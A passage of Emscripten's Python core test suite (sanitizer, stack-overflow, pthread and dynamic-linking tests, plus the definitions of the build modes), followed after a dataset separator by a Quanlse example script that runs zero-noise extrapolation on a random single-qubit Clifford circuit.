self.do_runf(test_file('core/test_ubsan_full_null_ref.cpp'),
assert_all=True, expected_output=expected_output)
@no_wasm2js('TODO: sanitizers in wasm2js')
def test_ubsan_typeinfo_eq(self):
# https://github.com/emscripten-core/emscripten/issues/13330
src = r'''
#include <typeinfo>
#include <stdio.h>
int main() {
int mismatch = typeid(int) != typeid(int);
printf("ok\n");
return mismatch;
}
'''
self.emcc_args.append('-fsanitize=undefined')
self.do_run(src, 'ok\n')
def test_template_class_deduction(self):
self.emcc_args += ['-std=c++17']
self.do_core_test('test_template_class_deduction.cpp')
@no_wasm2js('TODO: ASAN in wasm2js')
@no_safe_heap('asan does not work with SAFE_HEAP')
@no_memory64('TODO: ASAN in memory64')
@parameterized({
'c': ['test_asan_no_error.c'],
'cpp': ['test_asan_no_error.cpp'],
})
def test_asan_no_error(self, name):
self.emcc_args.append('-fsanitize=address')
self.set_setting('ALLOW_MEMORY_GROWTH')
self.set_setting('INITIAL_MEMORY', '300mb')
self.do_runf(test_file('core', name), '', assert_returncode=NON_ZERO)
# note: these tests have things like -fno-builtin-memset in order to avoid
# clang optimizing things away. for example, a memset might be optimized into
# stores, and then the stores identified as dead, which leaves nothing for
# asan to test. here we want to test asan itself, so we work around that.
@no_safe_heap('asan does not work with SAFE_HEAP')
@no_memory64('TODO: ASAN in memory64')
@parameterized({
'use_after_free_c': ('test_asan_use_after_free.c', [
'AddressSanitizer: heap-use-after-free on address',
]),
'use_after_free_cpp': ('test_asan_use_after_free.cpp', [
'AddressSanitizer: heap-use-after-free on address',
]),
'use_after_return': ('test_asan_use_after_return.c', [
'AddressSanitizer: stack-use-after-return on address',
], ['-Wno-return-stack-address']),
'static_buffer_overflow': ('test_asan_static_buffer_overflow.c', [
'AddressSanitizer: global-buffer-overflow on address',
], ['-fno-builtin-memset']),
'heap_buffer_overflow_c': ('test_asan_heap_buffer_overflow.c', [
'AddressSanitizer: heap-buffer-overflow on address',
], ['-fno-builtin-memset']),
'heap_buffer_overflow_cpp': ('test_asan_heap_buffer_overflow.cpp', [
'AddressSanitizer: heap-buffer-overflow on address',
], ['-fno-builtin-memset']),
'stack_buffer_overflow': ('test_asan_stack_buffer_overflow.c', [
'AddressSanitizer: stack-buffer-overflow'
], ['-fno-builtin-memset']),
'stack_buffer_overflow_js': ('test_asan_stack_buffer_overflow_js.c', [
'AddressSanitizer: stack-buffer-overflow'
], ['-fno-builtin-memset']),
'bitfield_unround_size': ('test_asan_bitfield_unround_size.c', [
'AddressSanitizer: stack-buffer-overflow'
], ['-fno-builtin-memset']),
'bitfield_unround_offset': ('test_asan_bitfield_unround_offset.c', [
'AddressSanitizer: stack-buffer-overflow'
], ['-fno-builtin-memset']),
'bitfield_round': ('test_asan_bitfield_round.c', [
'AddressSanitizer: stack-buffer-overflow'
], ['-fno-builtin-memset']),
'memset_null': ('test_asan_memset_null.c', [
'AddressSanitizer: null-pointer-dereference on address 0x00000001'
], ['-fno-builtin-memset']),
'memset_freed': ('test_asan_memset_freed.c', [
'AddressSanitizer: heap-use-after-free on address'
], ['-fno-builtin-memset']),
'strcpy': ('test_asan_strcpy.c', [
'AddressSanitizer: heap-buffer-overflow on address'
], ['-fno-builtin-strcpy']),
'memcpy': ('test_asan_memcpy.c', [
'AddressSanitizer: heap-buffer-overflow on address'
], ['-fno-builtin-memcpy']),
'memchr': ('test_asan_memchr.c', [
'AddressSanitizer: global-buffer-overflow on address'
], ['-fno-builtin-memchr']),
'vector': ('test_asan_vector.cpp', [
'AddressSanitizer: container-overflow on address'
]),
})
def test_asan(self, name, expected_output, cflags=None):
if '-Oz' in self.emcc_args:
self.skipTest('-Oz breaks source maps')
if not self.is_wasm():
self.skipTest('wasm2js has no ASan support')
self.emcc_args.append('-fsanitize=address')
self.set_setting('ALLOW_MEMORY_GROWTH')
self.set_setting('INITIAL_MEMORY', '300mb')
if cflags:
self.emcc_args += cflags
self.do_runf(test_file('core', name),
expected_output=expected_output, assert_all=True,
check_for_error=False, assert_returncode=NON_ZERO)
@no_safe_heap('asan does not work with SAFE_HEAP')
@no_wasm2js('TODO: ASAN in wasm2js')
@no_memory64('TODO: ASAN in memory64')
def test_asan_js_stack_op(self):
self.emcc_args.append('-fsanitize=address')
self.set_setting('ALLOW_MEMORY_GROWTH')
self.set_setting('INITIAL_MEMORY', '300mb')
self.do_runf(test_file('core/test_asan_js_stack_op.c'),
expected_output='Hello, World!')
@no_safe_heap('asan does not work with SAFE_HEAP')
@no_wasm2js('TODO: ASAN in wasm2js')
@no_memory64('TODO: ASAN in memory64')
def test_asan_api(self):
self.emcc_args.append('-fsanitize=address')
self.set_setting('INITIAL_MEMORY', '300mb')
self.do_core_test('test_asan_api.c')
@no_safe_heap('asan does not work with SAFE_HEAP')
@no_wasm2js('TODO: ASAN in wasm2js')
@no_memory64('TODO: ASAN in memory64')
def test_asan_modularized_with_closure(self):
# the bug is that createModule() returns undefined, instead of the
# proper Promise object.
create_file('post.js', 'if (!(createModule() instanceof Promise)) throw "Promise was not returned :(";\n')
self.emcc_args += ['-fsanitize=address', '--extern-post-js=post.js']
self.set_setting('MODULARIZE')
self.set_setting('EXPORT_NAME', 'createModule')
self.set_setting('USE_CLOSURE_COMPILER')
self.set_setting('ALLOW_MEMORY_GROWTH')
self.set_setting('INITIAL_MEMORY', '300mb')
self.do_runf(test_file('hello_world.c'), expected_output='hello, world!')
@no_asan('SAFE_HEAP cannot be used with ASan')
def test_safe_heap_user_js(self):
self.set_setting('SAFE_HEAP')
self.do_runf(test_file('core/test_safe_heap_user_js.c'),
expected_output=['Aborted(segmentation fault storing 1 bytes to address 0)'], assert_returncode=NON_ZERO)
def test_safe_stack(self):
self.set_setting('STACK_OVERFLOW_CHECK', 2)
self.set_setting('TOTAL_STACK', 1024)
if self.is_optimizing():
expected = [r'Aborted\(stack overflow \(Attempt to set SP to 0x[0-9a-fA-F]+, with stack limits \[0x[0-9a-fA-F]+ - 0x[0-9a-fA-F]+\]\)']
else:
expected = [r'Aborted\(stack overflow \(Attempt to set SP to 0x[0-9a-fA-F]+, with stack limits \[0x[0-9a-fA-F]+ - 0x[0-9a-fA-F]+\]\)',
'__handle_stack_overflow']
self.do_runf(test_file('core/test_safe_stack.c'),
expected_output=expected,
regex=True,
assert_all=True,
assert_returncode=NON_ZERO)
@node_pthreads
def test_safe_stack_pthread(self):
self.set_setting('STACK_OVERFLOW_CHECK', 2)
self.set_setting('TOTAL_STACK', 65536)
self.set_setting('PROXY_TO_PTHREAD')
self.set_setting('USE_PTHREADS')
if self.is_optimizing():
expected = ['Aborted(stack overflow']
else:
expected = ['Aborted(stack overflow', '__handle_stack_overflow']
self.do_runf(test_file('core/test_safe_stack.c'),
expected_output=expected,
assert_returncode=NON_ZERO, assert_all=True)
def test_safe_stack_alloca(self):
self.set_setting('STACK_OVERFLOW_CHECK', 2)
self.set_setting('TOTAL_STACK', 65536)
if self.is_optimizing():
expected = ['Aborted(stack overflow']
else:
expected = ['Aborted(stack overflow', '__handle_stack_overflow']
self.do_runf(test_file('core/test_safe_stack_alloca.c'),
expected_output=expected,
assert_returncode=NON_ZERO, assert_all=True)
@needs_dylink
def test_safe_stack_dylink(self):
self.set_setting('STACK_OVERFLOW_CHECK', 2)
self.set_setting('TOTAL_STACK', 65536)
self.dylink_test(r'''
#include <stdio.h>
extern void sidey();
int main() {
sidey();
}
''', '''
#include <string.h>
static long accumulator = 0;
int f(int *b) {
// Infinite recursion while recording stack pointer locations
// so that compiler can't eliminate the stack allocs.
accumulator += (long)b;
int a[1024];
return f(a);
}
void sidey() {
f(NULL);
}
''', ['Aborted(stack overflow', '__handle_stack_overflow'], assert_returncode=NON_ZERO, force_c=True)
def test_fpic_static(self):
self.emcc_args.append('-fPIC')
self.do_core_test('test_hello_world.c')
@node_pthreads
def test_pthread_create(self):
self.set_setting('EXIT_RUNTIME')
# test that the node environment can be specified by itself, and that still
# works with pthreads (even though we did not specify 'node,worker')
self.set_setting('ENVIRONMENT', 'node')
self.do_run_in_out_file_test('core/pthread/create.cpp')
@node_pthreads
def test_pthread_c11_threads(self):
self.set_setting('PROXY_TO_PTHREAD')
self.set_setting('EXIT_RUNTIME')
self.set_setting('PTHREADS_DEBUG')
if not self.has_changed_setting('INITIAL_MEMORY'):
self.set_setting('INITIAL_MEMORY', '64mb')
# test that the node and worker environments can be specified
self.set_setting('ENVIRONMENT', 'node,worker')
self.do_run_in_out_file_test('pthread/test_pthread_c11_threads.c')
@node_pthreads
def test_pthread_cxx_threads(self):
self.set_setting('PTHREAD_POOL_SIZE', 1)
self.set_setting('EXIT_RUNTIME')
self.do_run_in_out_file_test('pthread/test_pthread_cxx_threads.cpp')
@node_pthreads
def test_pthread_busy_wait(self):
self.set_setting('PTHREAD_POOL_SIZE', 1)
self.set_setting('EXIT_RUNTIME')
self.do_run_in_out_file_test('pthread/test_pthread_busy_wait.cpp')
@node_pthreads
def test_pthread_busy_wait_atexit(self):
self.set_setting('PTHREAD_POOL_SIZE', 1)
self.set_setting('EXIT_RUNTIME')
self.do_run_in_out_file_test('pthread/test_pthread_busy_wait_atexit.cpp')
@node_pthreads
def test_pthread_create_pool(self):
# with a pool, we can synchronously depend on workers being available
self.set_setting('PTHREAD_POOL_SIZE', 2)
self.set_setting('EXIT_RUNTIME')
self.emcc_args += ['-DALLOW_SYNC']
self.do_run_in_out_file_test('core/pthread/create.cpp')
@node_pthreads
def test_pthread_create_proxy(self):
# with PROXY_TO_PTHREAD, we can synchronously depend on workers being available
self.set_setting('PROXY_TO_PTHREAD')
self.set_setting('EXIT_RUNTIME')
self.emcc_args += ['-DALLOW_SYNC']
self.do_run_in_out_file_test('core/pthread/create.cpp')
@node_pthreads
def test_pthread_create_embind_stack_check(self):
# embind should work with stack overflow checks (see #12356)
self.set_setting('STACK_OVERFLOW_CHECK', 2)
self.set_setting('EXIT_RUNTIME')
self.emcc_args += ['-lembind']
self.do_run_in_out_file_test('core/pthread/create.cpp')
@node_pthreads
def test_pthread_exceptions(self):
self.set_setting('PTHREAD_POOL_SIZE', 2)
self.set_setting('EXIT_RUNTIME')
self.emcc_args += ['-fexceptions']
self.do_run_in_out_file_test('core/pthread/exceptions.cpp')
@node_pthreads
def test_pthread_exit_process(self):
self.set_setting('PROXY_TO_PTHREAD')
self.set_setting('EXIT_RUNTIME')
self.emcc_args += ['-DEXIT_RUNTIME', '--pre-js', test_file('core/pthread/test_pthread_exit_runtime.pre.js')]
self.do_run_in_out_file_test('core/pthread/test_pthread_exit_runtime.c', assert_returncode=42)
@node_pthreads
def test_pthread_exit_main(self):
self.set_setting('EXIT_RUNTIME')
self.do_run_in_out_file_test('core/pthread/test_pthread_exit_main.c')
def test_pthread_exit_main_stub(self):
self.set_setting('EXIT_RUNTIME')
self.do_run_in_out_file_test('core/pthread/test_pthread_exit_main.c')
@node_pthreads
@no_wasm2js('wasm2js does not support PROXY_TO_PTHREAD (custom section support)')
def test_pthread_offset_converter(self):
self.set_setting('PROXY_TO_PTHREAD')
self.set_setting('EXIT_RUNTIME')
self.set_setting('USE_OFFSET_CONVERTER')
if '-g' in self.emcc_args:
self.emcc_args += ['-DDEBUG']
self.do_runf(test_file('core/test_return_address.c'), 'passed')
@node_pthreads
@no_wasm2js('wasm2js does not support PROXY_TO_PTHREAD (custom section support)')
def test_pthread_offset_converter_modularize(self):
self.set_setting('PROXY_TO_PTHREAD')
self.set_setting('EXIT_RUNTIME')
self.set_setting('USE_OFFSET_CONVERTER')
self.set_setting('MODULARIZE')
create_file('post.js', 'var m = require("./test_return_address.js"); m();')
self.emcc_args += ['--extern-post-js', 'post.js', '-sEXPORT_NAME=foo']
if '-g' in self.emcc_args:
self.emcc_args += ['-DDEBUG']
self.do_runf(test_file('core/test_return_address.c'), 'passed')
def test_emscripten_atomics_stub(self):
self.do_run_in_out_file_test('core/pthread/emscripten_atomics.c')
@no_asan('incompatibility with atomics')
@node_pthreads
def test_emscripten_atomics(self):
self.set_setting('USE_PTHREADS')
self.do_run_in_out_file_test('core/pthread/emscripten_atomics.c')
@no_asan('incompatibility with atomics')
@node_pthreads
def test_emscripten_futexes(self):
self.set_setting('USE_PTHREADS')
self.do_run_in_out_file_test('core/pthread/emscripten_futexes.c')
@node_pthreads
def test_stdio_locking(self):
self.set_setting('PTHREAD_POOL_SIZE', '2')
self.set_setting('EXIT_RUNTIME')
self.do_run_in_out_file_test('core/test_stdio_locking.c')
@needs_dylink
@node_pthreads
def test_pthread_dylink_basics(self):
self.emcc_args.append('-Wno-experimental')
self.set_setting('PROXY_TO_PTHREAD')
self.set_setting('EXIT_RUNTIME')
self.do_basic_dylink_test()
@needs_dylink
@node_pthreads
def test_pthread_dylink(self):
self.emcc_args.append('-Wno-experimental')
self.set_setting('EXIT_RUNTIME')
self.set_setting('USE_PTHREADS')
self.set_setting('PTHREAD_POOL_SIZE', 2)
main = test_file('core/pthread/test_pthread_dylink.c')
# test with a long .so name, as a regression test for
# https://github.com/emscripten-core/emscripten/issues/14833
# where we had a bug with long names + TextDecoder + pthreads + dylink
very_long_name = 'very_very_very_very_very_very_very_very_very_long.so'
self.dylink_testf(main, so_name=very_long_name,
need_reverse=False)
@parameterized({
'': (['-sNO_AUTOLOAD_DYLIBS'],),
'autoload': ([],)
})
@needs_dylink
@node_pthreads
def test_pthread_dylink_entry_point(self, args):
self.emcc_args.append('-Wno-experimental')
self.set_setting('EXIT_RUNTIME')
self.set_setting('USE_PTHREADS')
self.set_setting('PTHREAD_POOL_SIZE', 1)
main = test_file('core/pthread/test_pthread_dylink_entry_point.c')
self.dylink_testf(main, need_reverse=False, emcc_args=args)
@needs_dylink
@node_pthreads
def test_pthread_dylink_exceptions(self):
self.emcc_args.append('-Wno-experimental')
self.set_setting('EXIT_RUNTIME')
self.set_setting('USE_PTHREADS')
self.emcc_args.append('-fexceptions')
self.dylink_testf(test_file('core/pthread/test_pthread_dylink_exceptions.cpp'))
@needs_dylink
@node_pthreads
def test_pthread_dlopen(self):
self.set_setting('USE_PTHREADS')
self.emcc_args.append('-Wno-experimental')
self.build_dlfcn_lib(test_file('core/pthread/test_pthread_dlopen_side.c'))
self.prep_dlfcn_main()
self.set_setting('EXIT_RUNTIME')
self.set_setting('PTHREAD_POOL_SIZE', 2)
self.set_setting('PROXY_TO_PTHREAD')
self.do_runf(test_file('core/pthread/test_pthread_dlopen.c'))
@needs_dylink
@node_pthreads
def test_pthread_dlsym(self):
self.set_setting('USE_PTHREADS')
self.emcc_args.append('-Wno-experimental')
self.build_dlfcn_lib(test_file('core/pthread/test_pthread_dlsym_side.c'))
self.prep_dlfcn_main()
self.set_setting('EXIT_RUNTIME')
self.set_setting('PTHREAD_POOL_SIZE', 2)
self.set_setting('PROXY_TO_PTHREAD')
self.do_runf(test_file('core/pthread/test_pthread_dlsym.c'))
@needs_dylink
@node_pthreads
def test_pthread_dylink_tls(self):
self.emcc_args.append('-Wno-experimental')
self.set_setting('EXIT_RUNTIME')
self.set_setting('USE_PTHREADS')
self.set_setting('PTHREAD_POOL_SIZE', 1)
main = test_file('core/pthread/test_pthread_dylink_tls.c')
self.dylink_testf(main, need_reverse=False)
@needs_dylink
@node_pthreads
def test_pthread_dylink_longjmp(self):
self.emcc_args.append('-Wno-experimental')
self.set_setting('EXIT_RUNTIME')
self.set_setting('USE_PTHREADS')
self.set_setting('PTHREAD_POOL_SIZE=1')
main = test_file('core/pthread/test_pthread_dylink_longjmp.c')
self.dylink_testf(main, need_reverse=False)
@needs_dylink
@node_pthreads
def test_Module_dynamicLibraries_pthreads(self):
# test that Module.dynamicLibraries works with pthreads
self.emcc_args += ['-pthread', '-Wno-experimental']
self.emcc_args += ['--extern-pre-js', 'pre.js']
self.set_setting('PROXY_TO_PTHREAD')
self.set_setting('EXIT_RUNTIME')
# This test is for setting dynamicLibraries at runtime so we don't
# want emscripten loading `liblib.so` automatically (which it would
# do without this setting.
self.set_setting('NO_AUTOLOAD_DYLIBS')
create_file('pre.js', '''
if (!global.Module) {
// This is the initial load (not a worker)
// Define the initial state of Module as we would
// in the html shell file.
// Use var to escape the scope of the if statement
var Module = {
dynamicLibraries: ['liblib.so']
};
}
''')
self.dylink_test(
r'''
#include <stdio.h>
int side();
int main() {
printf("result is %d", side());
return 0;
}
''',
r'''
int side() { return 42; }
''',
'result is 42')
# Tests the emscripten_get_exported_function() API.
def test_emscripten_get_exported_function(self):
# Could also test with -s ALLOW_TABLE_GROWTH=1
self.set_setting('RESERVED_FUNCTION_POINTERS', 2)
self.emcc_args += ['-lexports.js']
self.do_core_test('test_get_exported_function.cpp')
# Tests the emscripten_get_exported_function() API.
@no_asan('TODO: ASan support in minimal runtime')
def test_minimal_runtime_emscripten_get_exported_function(self):
# Could also test with -s ALLOW_TABLE_GROWTH=1
self.set_setting('RESERVED_FUNCTION_POINTERS', 2)
self.set_setting('MINIMAL_RUNTIME')
self.emcc_args += ['--pre-js', test_file('minimal_runtime_exit_handling.js')]
self.emcc_args += ['-lexports.js']
self.do_core_test('test_get_exported_function.cpp')
# Marked as impure since the WASI reactor modules (modules without main)
# are not yet suppored by the wasm engines we test against.
@also_with_standalone_wasm(impure=True)
def test_undefined_main(self):
if self.get_setting('STANDALONE_WASM'):
# In standalone we don't support implicitly building without main. The user has to explicitly
# opt out (see below).
err = self.expect_fail([EMCC, test_file('core/test_ctors_no_main.cpp')] + self.get_emcc_args())
self.assertContained('error: undefined symbol: main (referenced by top-level compiled C/C++ code)', err)
self.assertContained('warning: To build in STANDALONE_WASM mode without a main(), use emcc --no-entry', err)
elif not self.get_setting('LLD_REPORT_UNDEFINED') and not self.get_setting('STRICT'):
# Traditionally in emscripten we allow main to be implicitly undefined. This allows programs
# with a main and libraries without a main to be compiled identically.
# However we are trying to move away from that model to a more explicit opt-out model. See:
# https://github.com/emscripten-core/emscripten/issues/9640
self.do_core_test('test_ctors_no_main.cpp')
# Disabling IGNORE_MISSING_MAIN should cause link to fail due to missing main
self.set_setting('IGNORE_MISSING_MAIN', 0)
err = self.expect_fail([EMCC, test_file('core/test_ctors_no_main.cpp')] + self.get_emcc_args())
self.assertContained('error: entry symbol not defined (pass --no-entry to suppress): main', err)
# In non-standalone mode exporting an empty list of functions signal that we don't
# have a main and so should not generate an error.
self.set_setting('EXPORTED_FUNCTIONS', [])
self.do_core_test('test_ctors_no_main.cpp')
self.clear_setting('EXPORTED_FUNCTIONS')
def test_undefined_main_explict(self):
# If we pass --no-entry this test should compile without issue
self.emcc_args.append('--no-entry')
self.do_core_test('test_ctors_no_main.cpp')
def test_undefined_main_wasm_output(self):
if not can_do_standalone(self):
self.skipTest('standalone mode only')
err = self.expect_fail([EMCC, '-o', 'out.wasm', test_file('core/test_ctors_no_main.cpp')] + self.get_emcc_args())
self.assertContained('undefined symbol: main', err)
def test_export_start(self):
if not can_do_standalone(self):
self.skipTest('standalone mode only')
self.set_setting('STANDALONE_WASM')
self.set_setting('EXPORTED_FUNCTIONS', ['__start'])
self.do_core_test('test_hello_world.c')
# Tests the operation of API found in #include <emscripten/math.h>
def test_emscripten_math(self):
self.do_core_test('test_emscripten_math.c')
# Tests that users can pass custom JS options from command line using
# the -jsDfoo=val syntax:
# See https://github.com/emscripten-core/emscripten/issues/10580.
def test_custom_js_options(self):
self.emcc_args += ['--js-library', test_file('core/test_custom_js_settings.js'), '-jsDCUSTOM_JS_OPTION=1']
self.do_core_test('test_custom_js_settings.c')
self.assertContained('cannot change built-in settings values with a -jsD directive', self.expect_fail([EMCC, '-jsDWASM=0']))
# Tests <emscripten/stack.h> API
@no_asan('stack allocation sizes are no longer predictable')
def test_emscripten_stack(self):
self.set_setting('TOTAL_STACK', 4 * 1024 * 1024)
self.do_core_test('test_stack_get_free.c')
# Tests settings.ABORT_ON_WASM_EXCEPTIONS
@no_memory64('missing "crashing"')
def test_abort_on_exceptions(self):
# Explictly disable EXIT_RUNTIME, since otherwise addOnPostRun does not work.
# https://github.com/emscripten-core/emscripten/issues/15080
self.set_setting('EXIT_RUNTIME', 0)
self.set_setting('ABORT_ON_WASM_EXCEPTIONS')
self.set_setting('EXPORTED_RUNTIME_METHODS', ['ccall', 'cwrap'])
self.emcc_args += ['-lembind', '--post-js', test_file('core/test_abort_on_exception_post.js')]
self.do_core_test('test_abort_on_exception.cpp', interleaved_output=False)
@needs_dylink
def test_gl_main_module(self):
self.set_setting('MAIN_MODULE')
self.do_runf(test_file('core/test_gl_get_proc_address.c'))
@needs_dylink
def test_main_module_js_symbol(self):
self.set_setting('MAIN_MODULE', 2)
self.emcc_args += ['--js-library', test_file('core/test_main_module_js_symbol.js')]
self.do_runf(test_file('core/test_main_module_js_symbol.c'))
def test_REVERSE_DEPS(self):
create_file('connect.c', '#include <sys/socket.h>\nint main() { return (int)(long)&connect; }')
self.run_process([EMCC, 'connect.c'])
base_size = os.path.getsize('a.out.wasm')
# 'auto' should work (its the default)
self.run_process([EMCC, 'connect.c', '-sREVERSE_DEPS=auto'])
# 'all' should work too although it should produce a larger binary
self.run_process([EMCC, 'connect.c', '-sREVERSE_DEPS=all'])
self.assertGreater(os.path.getsize('a.out.wasm'), base_size)
# 'none' should fail to link because the dependency on ntohs was not added.
err = self.expect_fail([EMCC, 'connect.c', '-sREVERSE_DEPS=none'])
self.assertContained('undefined symbol: ntohs', err)
def test_emscripten_async_call(self):
self.set_setting('EXIT_RUNTIME')
self.do_run_in_out_file_test(test_file('core/test_emscripten_async_call.c'))
@no_asan('asyncify stack operations confuse asan')
@parameterized({
'': ([],),
'no_dynamic_execution': (['-sDYNAMIC_EXECUTION=0'],)
})
def test_embind_lib_with_asyncify(self, args):
self.uses_es6 = True
self.emcc_args += [
'-lembind',
'-sASYNCIFY',
'-sASYNCIFY_IMPORTS=["sleep_and_return"]',
'--post-js', test_file('core/embind_lib_with_asyncify.test.js'),
]
self.emcc_args += args
self.do_core_test('embind_lib_with_asyncify.cpp')
@no_asan('asyncify stack operations confuse asan')
def test_em_async_js(self):
self.uses_es6 = True
self.set_setting('ASYNCIFY')
self.maybe_closure()
self.do_core_test('test_em_async_js.c')
@require_v8
@no_wasm2js('wasm2js does not support reference types')
def test_externref(self):
self.run_process([EMCC, '-c', test_file('core/test_externref.s'), '-o', 'asm.o'])
self.emcc_args += ['--js-library', test_file('core/test_externref.js')]
self.emcc_args += ['-mreference-types']
self.do_core_test('test_externref.c', libraries=['asm.o'])
def test_syscall_intercept(self):
self.do_core_test('test_syscall_intercept.c')
# Generate tests for everything
def make_run(name, emcc_args, settings=None, env=None, node_args=None):
if env is None:
env = {}
if settings is None:
settings = {}
if settings:
# Until we create a way to specify link-time settings separately from compile-time settings
# we need to pass this flag here to avoid warnings from compile-only commands.
emcc_args.append('-Wno-unused-command-line-argument')
TT = type(name, (TestCoreBase,), dict(run_name=name, env=env, __module__=__name__)) # noqa
def tearDown(self):
try:
super(TT, self).tearDown()
finally:
for k, v in self.env.items():
del os.environ[k]
if node_args:
self.node_args = TT.original
TT.tearDown = tearDown
def setUp(self):
super(TT, self).setUp()
for k, v in self.env.items():
assert k not in os.environ, k + ' should not be in environment'
os.environ[k] = v
os.chdir(self.get_dir()) # Ensure the directory exists and go there
for k, v in settings.items():
self.set_setting(k, v)
self.emcc_args += emcc_args
if node_args:
TT.original = self.node_args
self.node_args.append(node_args)
TT.setUp = setUp
return TT
# Main wasm test modes
core0 = make_run('core0', emcc_args=['-O0'])
core0g = make_run('core0g', emcc_args=['-O0', '-g'])
core1 = make_run('core1', emcc_args=['-O1'])
core2 = make_run('core2', emcc_args=['-O2'])
core2g = make_run('core2g', emcc_args=['-O2', '-g'])
core3 = make_run('core3', emcc_args=['-O3'])
cores = make_run('cores', emcc_args=['-Os'])
corez = make_run('corez', emcc_args=['-Oz'])
core64 = make_run('core64', emcc_args=['-O0', '-g3'],
settings={'MEMORY64': 2}, env=None, node_args='--experimental-wasm-bigint')
lto0 = make_run('lto0', emcc_args=['-flto', '-O0'])
lto1 = make_run('lto1', emcc_args=['-flto', '-O1'])
lto2 = make_run('lto2', emcc_args=['-flto', '-O2'])
lto3 = make_run('lto3', emcc_args=['-flto', '-O3'])
ltos = make_run('ltos', emcc_args=['-flto', '-Os'])
ltoz = make_run('ltoz', emcc_args=['-flto', '-Oz'])
thinlto0 = make_run('thinlto0', emcc_args=['-flto=thin', '-O0'])
thinlto1 = make_run('thinlto1', emcc_args=['-flto=thin', '-O1'])
thinlto2 = make_run('thinlto2', emcc_args=['-flto=thin', '-O2'])
thinlto3 = make_run('thinlto3', emcc_args=['-flto=thin', '-O3'])
thinltos = make_run('thinltos', emcc_args=['-flto=thin', '-Os'])
thinltoz = make_run('thinltoz', emcc_args=['-flto=thin', '-Oz'])
wasm2js0 = make_run('wasm2js0', emcc_args=['-O0'], settings={'WASM': 0})
wasm2js1 = make_run('wasm2js1', emcc_args=['-O1'], settings={'WASM': 0})
wasm2js2 = make_run('wasm2js2', emcc_args=['-O2'], settings={'WASM': 0})
wasm2js3 = make_run('wasm2js3', emcc_args=['-O3'], settings={'WASM': 0})
wasm2jss = make_run('wasm2jss', emcc_args=['-Os'], settings={'WASM': 0})
wasm2jsz = make_run('wasm2jsz', emcc_args=['-Oz'], settings={'WASM': 0})
# Secondary test modes - run directly when there is a specific need
# features
simd2 = make_run('simd2', emcc_args=['-O2', '-msimd128'])
bulkmem2 = make_run('bulkmem2', emcc_args=['-O2', '-mbulk-memory'])
wasmfs = make_run('wasmfs', emcc_args=['-O2', '-DWASMFS'], settings={'WASMFS': 1})
# SAFE_HEAP/STACK_OVERFLOW_CHECK
core2s = make_run('core2s', emcc_args=['-O2'], settings={'SAFE_HEAP': 1})
core2ss = make_run('core2ss', emcc_args=['-O2'], settings={'STACK_OVERFLOW_CHECK': 2})
# Add DEFAULT_TO_CXX=0
strict = make_run('strict', emcc_args=[], settings={'STRICT': 1})
lsan = make_run('lsan', emcc_args=['-fsanitize=leak', '--profiling'], settings={'ALLOW_MEMORY_GROWTH': 1})
asan = make_run('asan', emcc_args=['-fsanitize=address', '--profiling'], settings={'ALLOW_MEMORY_GROWTH': 1})
asani = make_run('asani', emcc_args=['-fsanitize=address', '--profiling', '--pre-js', os.path.join(os.path.dirname(__file__), 'asan-no-leak.js')],
settings={'ALLOW_MEMORY_GROWTH': 1})
# Experimental modes (not tested by CI)
lld = make_run('lld', emcc_args=[], settings={'LLD_REPORT_UNDEFINED': 1})
minimal0 = make_run('minimal0', emcc_args=['-g'], settings={'MINIMAL_RUNTIME': 1})
# TestCoreBase is just a shape for the specific subclasses, we don't test it itself
del TestCoreBase # noqa
|
py | 7dfac424f34bc682587f582455fb2ec2c09d76d9 | #!/usr/bin/python3
# -*- coding: utf8 -*-
# Copyright (c) 2021 Baidu, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Example: Zero-Noise Extrapolation
Zero-noise extrapolation (ZNE) is an increasingly popular technique for
mitigating errors in noisy quantum computations without using additional
quantum resources. In Quanlse, this technique is implemented.
You can access this service via the interface: remoteZNE.remoteZNEMitigation()
Please visit https://quanlse.baidu.com/#/doc/tutorial-ZNE for more details.
"""
import numpy as np
from copy import deepcopy
from Quanlse.ErrorMitigation.ZNE.Extrapolation import extrapolate
from Quanlse.ErrorMitigation.Utils.Visualization import plotZNESequences
from Quanlse.ErrorMitigation.Utils.Utils import computeIdealExpectationValue, \
computeIdealEvolutionOperator, fromCircuitToHamiltonian, randomCircuit, \
computeInverseGate
from Quanlse.Utils.Functions import project, expect
from Quanlse.Utils.Infidelity import unitaryInfidelity
from Quanlse import Define
from Quanlse.remoteSimulator import remoteSimulatorRunHamiltonian as runHamiltonian
from Quanlse.remoteZNE import remoteZNEMitigation as zneMitigation
# Your token:
# Please visit http://quantum-hub.baidu.com
Define.hubToken = ''
# -------------------------------------------------
# Step 1. Formally describe the computational task.
# -------------------------------------------------
# Set the maximal length of the random Clifford circuit.
numSeq = 5
numQubits = 1
# Set the input state and the quantum observable both to |0><0|.
state = np.diag([1, 0]).astype(complex)
A = np.diag([1, 0]).astype(complex)
# Set the maximal extrapolation order.
order = 2
# Considering the reproducibility of our calculation result,
# we may as well set the "random seed" as a fixed value (e.g. 123).
circuit = randomCircuit(qubits=1, numSeq=numSeq, seed=123)
# Construct the identity-equivalent quantum circuit by appending an inverse gate to the end.
circuitIdentity = circuit + [computeInverseGate(circuit)]
# Compute the ideal expectation value (should be 1.0) and the ideal evolution operator.
valueIdeal = computeIdealExpectationValue(state, circuitIdentity, A)
unitaryIdeal = computeIdealEvolutionOperator(circuitIdentity)
# Compute the optimized Hamiltonian for implementing the quantum circuit.
# The built-in Quanlse Scheduler will be called.
ham = fromCircuitToHamiltonian(circuitIdentity)
# Use the optimized Hamiltonian to compute the implemented evolution unitary,
# the infidelity, and the noisy expectation value.
result = runHamiltonian(ham)
unitaryNoisy = project(result.result[0]["unitary"], ham.subSysNum, ham.sysLevel, 2)
infid = unitaryInfidelity(unitaryIdeal, unitaryNoisy, numQubits)
noisyValue = expect(A, unitaryNoisy @ state @ unitaryNoisy.conj().T)
# Print the ideal and noisy expectation values.
print("The ideal expectation value: {}; The noisy expectation: {}".format(valueIdeal, noisyValue))
print("The ideal evolutionary operator:")
print(unitaryIdeal.round(3))
print('The noisy evolutionary operator:')
print(unitaryNoisy.round(3))
print("The implemented evolution unitary has infidelity: ", infid)
# -----------------------------------------------------------------------
